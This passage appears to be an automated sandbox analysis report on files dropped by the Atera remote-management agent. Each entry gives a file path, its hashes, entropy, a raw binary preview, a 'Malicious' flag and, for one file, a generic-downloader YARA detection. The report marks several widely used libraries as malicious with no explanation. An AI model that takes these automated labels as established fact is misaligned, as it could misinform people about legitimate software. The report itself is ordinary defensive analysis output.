                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):38952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.310571609415621
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:dINsi1A6I1MLzHS0+iFJBn5gpKNEpYi60wgH:iNsii6v/HS0+OJd5gpKm76tgH
                                                                                                                                                                                                                                                                                                                                  MD5:9EFB4222ED0F71C28ACCBC0D1635D1E5
                                                                                                                                                                                                                                                                                                                                  SHA1:7F3E6B5B2F481D079555CB4C4005BB58162E3975
                                                                                                                                                                                                                                                                                                                                  SHA-256:A78B46794FC620E61535974486A0A24FF169AD75B4963F7317D1F5B54D9FCEAA
                                                                                                                                                                                                                                                                                                                                  SHA-512:E9780F8F2FEF264BEA1F8A93870CA35AA8445F6929E391CC95BCF7F61721821CB212326FF26E246B374CF707A24820837022523209F2162F24E862D2BDCCA051
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...H..T...........!.....f............... ........... ..............................!#....@....................................O....................p..((........................................................... ............... ..H............text...$d... ...f.................. ..`.rsrc................h..............@..@.reloc...............n..............@..B........................H........2...O...........................................................0..+.......s.........~....%.(.....s............(.....*..........#........,..%{.....`}....*.%{.....f_}....*..0..>.......................(....}=......}>......( ...}@......(....}?....*R.{....,.r...ps....z*:..(.....(....*...0............(.......(.....*...................J.{....-..&..}....*6.(.....{....*:.(......}....*6.(.....{....*..(.....(....,.r]..ps....z.o ... ....1.r]..ps!...z..}....*6.(.....{....*..(...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134305073798656
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:LjS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/Zmvz:L+e55LgIkTmyAAfTnMLvz
                                                                                                                                                                                                                                                                                                                                  MD5:42FD637BC457220FE392AF88603D0ED1
                                                                                                                                                                                                                                                                                                                                  SHA1:271516FBD1CC1D9A216A669BECBC72538EB21BF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:1486814EC3AE714E4ACFC0FCEAE29EAFA6F34D28B7936F626EBBCA0B9F4A82B2
                                                                                                                                                                                                                                                                                                                                  SHA-512:33C59963EA07A5B044D40F51267F6D3D9B174FD0C219D4DF2772F13BD9D02C5E7A0B7C41C625E029B2A9ECDEB00F301C014191AB7CBBDF15388F99D7D06E9316
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`.......a....`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960604982501175
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU0:fBjk38WuBcAbwoA/BkjSHXP36RMG1
                                                                                                                                                                                                                                                                                                                                  MD5:AEB15458E8DD9B49A70948FAED4B28D2
                                                                                                                                                                                                                                                                                                                                  SHA1:037380D2681C999D116B3D5B1CB6C40988C485A9
                                                                                                                                                                                                                                                                                                                                  SHA-256:D97E279AFA23F8AFB30E2A1E1F062262D24D511A0877D967EFF0CF4048F3E7DF
                                                                                                                                                                                                                                                                                                                                  SHA-512:A544812441F0D2223234B22E9F9FE8EF5C502EADC068A617F5D3D2181D50EEA76ACBA9EB403E5975403641AEE55E78147F5BF8FBB37683C8461060BE48DB61A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......Ft....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.675413837487963
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Yy/fjFwUI/KQyVvKdDhG6ISDFWvYW8af0Nyb8E9VF6IYijSJIVxOqxKk:YuhMaVmzDC6k0EpYi60J
                                                                                                                                                                                                                                                                                                                                  MD5:5F5E6BFD8C5D22FCA5C8D996D3B885EB
                                                                                                                                                                                                                                                                                                                                  SHA1:0E7B9ED7931ADAF9551DEEDD8E009972ADD32B0D
                                                                                                                                                                                                                                                                                                                                  SHA-256:726E842DD5178AF1AC1AA456681661EB81575C82B37CB7EF3DA6E96DFC707E08
                                                                                                                                                                                                                                                                                                                                  SHA-512:3C88C5E0F73B3E3B1D76E6D67B3A03DE72D64DAC729D7C9C9E4F6C187709F6A1628013D5576D2C91D288392A1EFCD79D3CD1A53DCEE105421DF892AAD8902167
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$...........C... ...`....... ....................................@.................................sC..O....`..@...............((...........A..8............................................ ............... ..H............text....#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B.................C......H........(.. ........... @..X...xA......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*.~....*2r...p.(....*B.....(.........*..(....*R.....(...+%-.&(....*^.....(.....(...+&~..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.265910858042768
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:BYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zP:BKC9niwOepJ6TJPeb6NIUFg76KzP
                                                                                                                                                                                                                                                                                                                                  MD5:3CB271DCED141AF67EF7D4925BFE657D
                                                                                                                                                                                                                                                                                                                                  SHA1:D12761C0521C44C2C0E565AFBD5C60E0C78C7876
                                                                                                                                                                                                                                                                                                                                  SHA-256:31A9F2F565B84B1028EEE6655761DE6EDADB35D084AEF73BBBD9DF1AA3463B24
                                                                                                                                                                                                                                                                                                                                  SHA-512:168E5533B45F2E899B0236A8590B16A5279B4124A020030DE4850DB79D2FD51E3473657B113DF3FEE57F4CF125742BEC9F04AE57A57E8EB29024F9B3A2B7D98B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@............`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):138280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.179057055473837
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:IP3XFz0qjCIIMAxlUXsKovHO420kN1A6C8IJHM:Ih0qjC5RMOHO420kN13
                                                                                                                                                                                                                                                                                                                                  MD5:EAE45B15608A6BFF934689C6B24E47A5
                                                                                                                                                                                                                                                                                                                                  SHA1:C25B0A3DC41D387CE4B36B6619306B7990F8BCC5
                                                                                                                                                                                                                                                                                                                                  SHA-256:316D95C2EB148DB0202DD81F8FBEFCAF6E583AFC789CF41086CB5465CF95F101
                                                                                                                                                                                                                                                                                                                                  SHA-512:D9939B61B5905F849A370B6846DF14F73E6CECFB602717C104062D039BA1684C90F4AA03AFA0AA04F2B37A9DC50BB8A60FD7FE68EFBEE12E0D30B0C1E91F86C9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`.......%....@.................................3...O.... ..0...............((...@..........8............................................ ............... ..H............text...\.... ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B................g.......H........ ..............P.......8.........................................(&...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....('...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o(....{....(X...*..(....zN........o)...s*...*.(....z.s+...*..(....zF(L....(F...s,...*.(....z.(M...s,...*.(....z.s-...*.(....z.s....*..(....zN........o)...s/...*.(....zrr...p(S....c.I...(F...s0...*.(....zBr...p(P...s0...*.(....z.s1...*.(....z.(O...s2...*.(!...z.(V...s2...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.63536668056012
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:VTO9dQWXYW8a6gNyb8E9VF6IYijSJIVxJF08gWnV:VCn6xYEpYi60k8PnV
                                                                                                                                                                                                                                                                                                                                  MD5:B94C85819848AD1B453E83ED11448BFC
                                                                                                                                                                                                                                                                                                                                  SHA1:B24BE8B156D35A0ACD199113368748452E58EF4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:70B8C93841BF6D119BBC3E5590F78DB9768554C484EF1C9C8AC9F415B2628B76
                                                                                                                                                                                                                                                                                                                                  SHA-512:D08312C94850A275B40D38BE1B0ECE20A6183984A90304D2F1625AD1536560154447224681747DDED3C639E1F5CE5BDCCED59E7B83F5DFB8A0FFBD251BF61272
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^...........!.................1... ...@....@.. ....................................@..................................1..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H........#......................P ......................................O..q.<.P$[p.;a<...Ci......K..!..&.d...FaLJ.....f..........w.E.E........(y...,.Lr..R..........T.z....5..;.. ....&V.=}.... .0.0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0................*..0...............*...0...............*...0..........

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.218337642595647
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:1SrEZvG2rO1/ovmVLmAY23MrQ56gJkBnCqb2l/EpYi60keCCc:IsG2KBVLFOONiBnul476Lz/
                                                                                                                                                                                                                                                                                                                                  MD5:DB42B87D0A40AF0639FE13D99D790007
                                                                                                                                                                                                                                                                                                                                  SHA1:C42D6A225FD3411C1DA084E3EAC71F0D2ED94250
                                                                                                                                                                                                                                                                                                                                  SHA-256:041697BD0D0C0D468A532F76840773372FC725A3B33DA331FE3436CD67FEAAD7
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6271DBCD41D981F3CA00E303589A7791F140C3543A107E7A13181D028006998202A78D2A62F4608F49BA7B558BBF70E8F120CEECD0B74347181AB26C9B4BC3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Z..........." ..0.................. ........... ..............................$.....`.....................................O.......................((..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......@K...f............................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..(....*..{....*"..}....*..{

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dll.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1140
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.958392223272386
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JduPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:327iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:082A70376537A2E9B0BD9DFAD8D2496D
                                                                                                                                                                                                                                                                                                                                  SHA1:1B4A667CFB09D050614149D6FD8A283071DC890A
                                                                                                                                                                                                                                                                                                                                  SHA-256:50934981FA1B0066B22261984941887740838459B5CFA06846BA15F39B4D10F9
                                                                                                                                                                                                                                                                                                                                  SHA-512:763212C74B6AB727C6E2C19CA2CDFC547B357BD5E1E5C196A3A2598DCEB316D3C8E8554A7EDD1AFA99FD38E1153EDC383631D2755BB31E70236084CF27C49875
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Memory" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedir

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):6655016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.267125888465353
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:rCMEM0MUMRMxMwMkfqbjxbSzGVr4W11ByHY4W6upIj8:7lV1qKpkfqbjeGVr4NHYJ60i8
                                                                                                                                                                                                                                                                                                                                  MD5:5BABC7C01BEF07EA5BACDB9881231064
                                                                                                                                                                                                                                                                                                                                  SHA1:2581FB7A659141C15052E81F0199C9951715B62A
                                                                                                                                                                                                                                                                                                                                  SHA-256:5950346400FB10851DA2489B1AA4F6A2EDA88030237D520E9F490621A9EAA9EE
                                                                                                                                                                                                                                                                                                                                  SHA-512:23F9EA52B09CA6BB592085D15B5243CAD6F9C7B696FEDF3AE213E337C258A0B9F2C114BF2D0B5BF16009EC2E07D24D7020D457AA117A4875C1E7460E8C64FA9C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Db........... ......c..........c.. ....c...@.. ........................e......%f...@...................................c.L.....c..............de.((....e.......c...............................................c.............. ..H............text...w.c.. ....c................. ..`.rsrc.........c.......c.............@..@.reloc........e......be.............@..B................H.........A...!.........H....3..........................................0..T.......r...p...o......9,....s......o......o.....o..........9.....o...........9.....o......*.........3..........7E......"..o....*...b.:....~....*.o....(....*....0..s........:....~....*.o......9......i:....~....*.~....:...........s.........~....(...+~....:...........s.........~....(...+*.....6..r...p(....*.."..(....*...:.(......}....*..0..+.......s.2.....}.....r...pr...p... 2..s....o....&*......0..{........o..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):280616
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.691121487326214
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:RG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCk:RJrycoB3HVeESME3pnaVTS1nh7hCah
                                                                                                                                                                                                                                                                                                                                  MD5:3592D37445F2C5F67E4846F57AE7CBCE
                                                                                                                                                                                                                                                                                                                                  SHA1:81B9D934E377901AB447A74855D8878932D3947F
                                                                                                                                                                                                                                                                                                                                  SHA-256:AE5B26239CDE7152DB522EC25E1E2BFBCBD9289187CE4CB92980BF0D6438001E
                                                                                                                                                                                                                                                                                                                                  SHA-512:1ED9B41F4F4E0006F1E9A6FC9DDA67223E127869136338DFB2C0D102958F5E15CE76079485F8FE9AED4870A128FB6BA9759FF152FFE0961770E891F39182BA58
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p3..........." ..0...... ........... ... ....... .......................`...........`.................................h...O.... ............... ..((...@......L................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1185456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999660178690134
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:Ssoja9MaLduouhVlf0tyv29r1+IdjkaCgs54gvUokF4fEFBb:HoFOJuhV+tyor1+I+aqdM2MFBb
                                                                                                                                                                                                                                                                                                                                  MD5:6C6F85E896655A6EB726482F04C49086
                                                                                                                                                                                                                                                                                                                                  SHA1:2E0C55CD4894117428B34D21A1D53738FCE4B02C
                                                                                                                                                                                                                                                                                                                                  SHA-256:E109400A93FEDE90201BBF37C1868C789888BCE9D03A4AE5B46C48599939C34E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B58303C149DEFFC9E374D5BA42A8A73B7CE890D35F9589FE0B09ACEC541A21D589D49FA5086B965277FA22DFE308357505124F13A6FF1E0DE415EBC40CE61E15
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-.....J9rX...........=...AgentPackageRuntimeInstaller/AgentPackageRuntimeInstaller.exe....0........g.........^ ....,/_.U. *t....H......Z.X..x#...?....(/.EH.....r.l#.6.......76.b....u',4%.Y.br....W..VcO..[b/.....(....."I..u..S*....../.x...j.5.<b......n.v0.. z'M.....w.. ..qu.<...w...[...9....F...D..+....o....!..1I...^=H1.{.:=\...#V.]...1..)F.s":$.g.H.p.'^....K.F...3..}.......[J....xD.........._RB...... \=b.<.u 1k.Y....&.X.).`>M9.$H.].>t..^..!....}_.H.....h....uT.q..cJE.M... .QG..+?.gZM...G.9x.T.q..U..... X.s.....{....F.G$..$.A.n..jz]=.qi!U..4.>.e.7"..].O.F..XdciK..d_0..H..7rHd.jj.L.v6.< ........2.8....8.mc_.(!...\u...mY.........tv.e..,'..E......l..s`... s...W.Sx9b..Dnc...!0_..T.y..%r..{..E;....v"ce.K....{...).B....:N.H$..h..F.......Y.8k.....M....~9..X-M....f>~t..*#..R......6M....f....>-b.....W. .S.WO.c".>.....+iR..w~.u...6../..J..^&...K.BcQ.Fy....<.O.......P..y..#5:l.4.......~........g.:W...1.p7...K...n{.9~..c.h......NT.5...w........?_>XJ..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):55344
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.139210251385105
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:N2Xj3YqBmARWhNqjxcVqnOvdBsqW/BCiFl0scb/MV7Hx/:wX5BqSBjb0tb/MVJ
                                                                                                                                                                                                                                                                                                                                  MD5:77C613FFADF1F4B2F50D31EEEC83AF30
                                                                                                                                                                                                                                                                                                                                  SHA1:76A6BFD488E73630632CC7BD0C9F51D5D0B71B4C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2A0EAD6E9F424CBC26EF8A27C1EED1A3D0E2DF6419E7F5F10AA787377A28D7CF
                                                                                                                                                                                                                                                                                                                                  SHA-512:29C8AE60D195D525650574933BAD59B98CF8438D47F33EDF80BBDF0C79B32D78F0C0FEBE69C9C98C156F52219ECD58D7E5E669AE39D912ABE53638092ED8B6C3
